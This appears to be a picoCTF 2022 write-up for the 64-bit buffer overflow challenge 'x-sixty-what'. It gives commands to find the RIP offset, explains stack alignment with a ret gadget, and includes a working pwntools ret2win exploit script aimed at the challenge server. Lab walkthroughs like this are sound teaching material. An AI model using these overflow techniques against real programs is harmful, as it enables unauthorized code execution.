x-sixty-what picoCTF 2022 Solution

Published: July 20, 2023

Description

A 64-bit buffer overflow with no stack canary. Overflow the stack buffer to control RIP (the 64-bit instruction pointer) and redirect execution to a flag-printing function.

Key difference from 32-bit: 64-bit binaries use registers (RDI, RSI, RDX...) for the first six arguments, and RIP is 8 bytes wide - addresses must be packed with p64().

Download the binary and make it executable.

bash
wget https://artifacts.picoctf.net/c/192/vuln && chmod +x vuln

Check security mitigations with checksec.

bash
checksec --file=vuln

Find the offset with pwntools, and the address of the flag function with objdump or pwntools.

bash
objdump -d vuln | grep '<flag>'
For a step-by-step walkthrough of stack overflows, ret2win, and ROP scaffolding (cyclic offset, p64 packing, alignment), see the Buffer Overflow Binary Exploitation guide.
  1. Step 1: Identify the offset to RIP (it is 72)
    Generate a cyclic pattern with 8-byte unique windows, crash the binary, and read the qword at the top of the stack ($rsp) rather than RIP: on x86-64 the faulting ret never loads the pattern into RIP. With this binary, the offset is 72.
    bash
    # Pipe an 8-byte-unique cyclic pattern in to crash the binary:
    cyclic -n 8 200 | ./vuln
    
    # In GDB, repeat the run and read the qword at the top of the stack at the crash:
    gdb -q ./vuln -ex 'r <<< $(cyclic -n 8 200)' -ex 'x/gx $rsp'
    
    # Translate the qword read from the stack back to the offset:
    python3 -c "from pwn import cyclic_find; print(cyclic_find(0x616161616161616a, n=8))"
    # -> 72
    Learn more

    x86-64 calling convention (System V AMD64 ABI). The first six integer/pointer arguments go in registers in this order: rdi, rsi, rdx, rcx, r8, r9. Floating-point args go in xmm0..xmm7. Additional args go on the stack. Return value comes back in rax. The stack must be 16-byte aligned at the moment of call.
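
As a rough illustration of the register order above, the sketch below assigns integer or pointer arguments to registers and spills the rest to the stack. The helper name `assign_int_args` is hypothetical, and the model deliberately ignores floating-point and struct arguments.

```python
# Integer/pointer argument registers, in System V AMD64 order.
INT_ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def assign_int_args(args):
    """Map integer/pointer args to registers; extras go on the stack (hypothetical helper)."""
    in_regs = dict(zip(INT_ARG_REGS, args))
    on_stack = list(args[len(INT_ARG_REGS):])
    return in_regs, on_stack

regs, stack = assign_int_args([1, 2, 3, 4, 5, 6, 7, 8])
print(regs)   # first six arguments, keyed by register name
print(stack)  # seventh and later arguments
```

This is why a ret2win target that takes no arguments, like flag() here, needs no register setup, while a target with arguments would need gadgets that load rdi, rsi, and so on.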

    Stack at vuln() ret on x86-64:

    high addr  +-------------+
               | saved rip   |  <- 8 bytes, payload[72:80] -> ret gadget, then &flag() at payload[80:88]
               +-------------+
               | saved rbp   |  <- 8 bytes, payload[64:72]
               +-------------+
               | char buf[64]|  <- payload[0:64] = "AAAA..."
    low addr   +-------------+ <- rsp at gets()
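
The slice boundaries in the diagram can be checked with a few lines of arithmetic. This is a minimal sketch that uses filler bytes only; the `b"C" * 8` block is a stand-in for whatever address ends up in the saved-rip slot, not a real target.

```python
BUF_SIZE = 64        # char buf[64]
SAVED_RBP_SIZE = 8   # saved rbp sits directly above the buffer
OFFSET_TO_RIP = BUF_SIZE + SAVED_RBP_SIZE

payload = b"A" * BUF_SIZE          # payload[0:64]  fills buf
payload += b"B" * SAVED_RBP_SIZE   # payload[64:72] overwrites saved rbp
payload += b"C" * 8                # payload[72:80] overwrites saved rip (stand-in bytes)

print(OFFSET_TO_RIP)       # -> 72
print(payload[64:72])      # the bytes that land in saved rbp
print(payload[72:80])      # the bytes that land in saved rip
```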

    Why crash diagnostics differ from 32-bit. When ret tries to pop a non-canonical address (bits 48-63 must equal bit 47, otherwise the CPU raises #GP), the fault fires before rip is updated. You will see RIP pointing at the ret instruction, not at your pattern. Read $rsp instead to recover the cyclic bytes:

    (gdb) x/gx $rsp
    0x7fffffffe018: 0x616161616161616a   <- this 8-byte value is your pattern ("jaaaaaaa")
    
    (gdb) shell python3 -c "from pwn import *; print(cyclic_find(0x616161616161616a, n=8))"
    72
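
The canonical-address rule can be expressed as a small check. This is a sketch for illustration: `is_canonical` is a hypothetical helper, and the sample values are a typical user-space stack address and eight ASCII 'A' bytes.

```python
def is_canonical(addr):
    """True if bits 48-63 of a 64-bit address all equal bit 47."""
    top = addr >> 47  # bit 47 plus the 16 bits above it
    return top == 0 or top == 0x1FFFF

print(is_canonical(0x00007FFFFFFFE018))  # user-space stack address
print(is_canonical(0x4141414141414141))  # "AAAAAAAA" as a qword
```

Any qword made entirely of printable ASCII bytes fails this check, which is why a pattern-filled return address faults at ret instead of being loaded into rip.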

    The n=8 matters: pwntools' default cyclic uses 4-byte unique substrings. For 64-bit, generate with cyclic(200, n=8) so each 8-byte window is unique.
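
To see how a qword maps back to an offset without pwntools, here is a stdlib-only sketch. It assumes that the first 200 bytes of the n=8 lowercase pattern are 25 blocks of one letter followed by seven 'a' bytes, which is what cyclic(200, n=8) is expected to produce; `offset_of` is a hypothetical helper.

```python
# Assumption: the first 200 bytes of the n=8 pattern are the 8-byte blocks
# "aaaaaaaa", "baaaaaaa", "caaaaaaa", ... (one block per letter).
pattern = b"".join(bytes([ord("a") + k]) + b"a" * 7 for k in range(25))

def offset_of(qword):
    """Locate a little-endian qword read from the stack inside the pattern."""
    needle = qword.to_bytes(8, "little")
    return pattern.find(needle)

print(offset_of(0x616161616161616A))  # bytes "jaaaaaaa"
# -> 72
```

Under that assumption, the qword at offset 72 is the block starting with 'j' (the tenth letter, 9 * 8 = 72), so each 8-byte window identifies its position unambiguously.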

  2. Step 2: Find the flag() function address
    Use objdump or pwntools ELF to locate flag(). Because the binary has no PIE, the address is fixed each run. The objdump line is also a sanity check that the function exists where you expect it.
    bash
    # Confirm the flag() function exists and note its address:
    objdump -d vuln | grep '<flag>:'
    # -> 00000000004011d6 <flag>:
    python3 -c "from pwn import *; e=ELF('./vuln'); print(hex(e.symbols['flag']))"
    Learn more

    Without PIE (Position-Independent Executable), the binary is loaded at a fixed base address every time. checksec shows "No PIE" if this is the case. This means the virtual address of flag() in objdump output is exactly what you write into the payload - no calculation needed.

    With PIE enabled, the binary would be loaded at a random base address (ASLR for executables), and you would first need to leak an address from the binary to calculate the actual load address before computing flag()'s runtime address.
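
For contrast, the PIE case comes down to one subtraction and one addition. The sketch below uses made-up numbers throughout: the leaked address and both symbol offsets are hypothetical and do not come from this binary.

```python
# All values are hypothetical and only illustrate the arithmetic.
leaked_main = 0x55D4C3A01289  # runtime address of main() obtained from some leak
main_offset = 0x1289          # offset of main() inside the PIE binary
flag_offset = 0x11D6          # offset of flag() inside the PIE binary

load_base = leaked_main - main_offset   # where the binary was mapped this run
flag_runtime = load_base + flag_offset  # address to place in the payload

print(hex(load_base))
print(hex(flag_runtime))
```

With No PIE, as in this challenge, that step disappears and the address from objdump is used directly.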

  3. Step 3: Build the 64-bit exploit
    Pad 72 bytes, then return into flag(). On x86-64, a bare ret gadget goes before flag() in the chain so that RSP is 16-byte aligned when libc code called from flag() executes an SSE instruction such as movaps. Skip the gadget and the program crashes inside libc with SIGSEGV before printing anything.
    python
    from pwn import *
    
    elf = ELF('./vuln')
    flag_addr = elf.symbols['flag']
    
    # Find a bare 'ret' gadget for stack alignment (required for system() / movaps)
    rop = ROP(elf)
    ret_gadget = rop.find_gadget(['ret'])[0]
    
    payload  = b'A' * 72           # 64-byte buffer + 8-byte saved rbp = offset to RIP
    payload += p64(ret_gadget)     # overwrites saved rip: stack alignment gadget
    payload += p64(flag_addr)      # next return target: flag()
    
    # Replace <PORT_FROM_INSTANCE> with the port shown for your challenge instance.
    p = remote('saturn.picoctf.net', <PORT_FROM_INSTANCE>)
    p.sendlineafter(b'string:', payload)
    print(p.recvall().decode())
    Learn more

    The instruction that faults is a movaps with an rsp-relative memory operand, for example movaps [rsp+offset], xmm0: movaps requires its memory operand to be 16-byte aligned, while its cousin movups does not. printf, system, and many other libc routines contain such movaps spills and assume the ABI's stack alignment, so a 64-bit ret-to-libc-style chain that reaches them with rsp = ...0x8 faults there. Adding a single bare ret gadget before the target pops one extra 8-byte slot and shifts rsp back to ...0x0, satisfying the alignment.
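
The effect of the extra ret can be followed with modular arithmetic. This sketch measures rsp at the target's entry point, where a normal call leaves rsp 8 bytes past a 16-byte boundary (the return address was just pushed) and the prologue's push rbp restores alignment. The slot address is illustrative and both helper names are hypothetical.

```python
def rsp_at_target_entry(ret_slot, extra_ret_gadgets):
    """rsp when the target's first instruction runs; every ret pops 8 bytes."""
    return ret_slot + 8 * (1 + extra_ret_gadgets)

def matches_call_entry(rsp):
    """After a normal call, rsp % 16 == 8 at function entry."""
    return rsp % 16 == 8

RET_SLOT = 0x7FFFFFFFE018  # illustrative address of the saved-rip slot

for gadgets in (0, 1):
    rsp = rsp_at_target_entry(RET_SLOT, gadgets)
    print(gadgets, hex(rsp), matches_call_entry(rsp))
```

With no gadget, the target starts with rsp on a 16-byte boundary, so everything after its push rbp is off by 8; one extra ret restores the state a real call would have produced.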

    p64(addr) packs a 64-bit address as 8 bytes in little-endian order, which is what x86-64 stores on the stack. This is the 64-bit counterpart of p32() used in 32-bit exploits.
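
For readers without pwntools at hand, the same byte layout can be produced with the standard library. This is a sketch of the equivalent packing, not pwntools' own implementation; `pack64` and `pack32` are hypothetical names, and the address is the one shown for flag() in the objdump output.

```python
import struct

def pack64(addr):
    """Pack an address as 8 little-endian bytes, the layout p64() produces."""
    return struct.pack("<Q", addr)

def pack32(addr):
    """Pack an address as 4 little-endian bytes, the layout p32() produces."""
    return struct.pack("<I", addr)

print(pack64(0x4011D6).hex())  # -> d611400000000000
print(pack32(0x4011D6).hex())  # -> d6114000
```

The four trailing zero bytes in the 64-bit form are part of the address, which matters when the input function stops at certain byte values.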

    ROP(elf).find_gadget(['ret']) searches the binary for a bare ret instruction and returns a gadget object (or None if there is no match); indexing it with [0] gives the gadget's address. This is the simplest possible ROP gadget.
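
Conceptually, locating a bare ret means finding the single-byte opcode 0xC3 in executable code. The sketch below is a simplification and not how pwntools works internally: it scans a hand-assembled byte string (push rbp; mov rbp, rsp; pop rbp; ret) at a hypothetical base address, and it does not check that a match sits on a real instruction boundary.

```python
RET_OPCODE = 0xC3  # x86-64 near return

def find_ret_candidates(code, base):
    """Return the address of every 0xC3 byte in a code blob (hypothetical helper)."""
    return [base + i for i, byte in enumerate(code) if byte == RET_OPCODE]

# push rbp; mov rbp, rsp; pop rbp; ret
code = bytes.fromhex("554889e55dc3")
print([hex(addr) for addr in find_ret_candidates(code, 0x401000)])
# -> ['0x401005']
```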

Flag

picoCTF{b1663r_15_b3773r_3...}

Overflow 72 bytes to RIP, add a ret gadget for stack alignment, then jump to flag(). Pack the 64-bit address with p64().
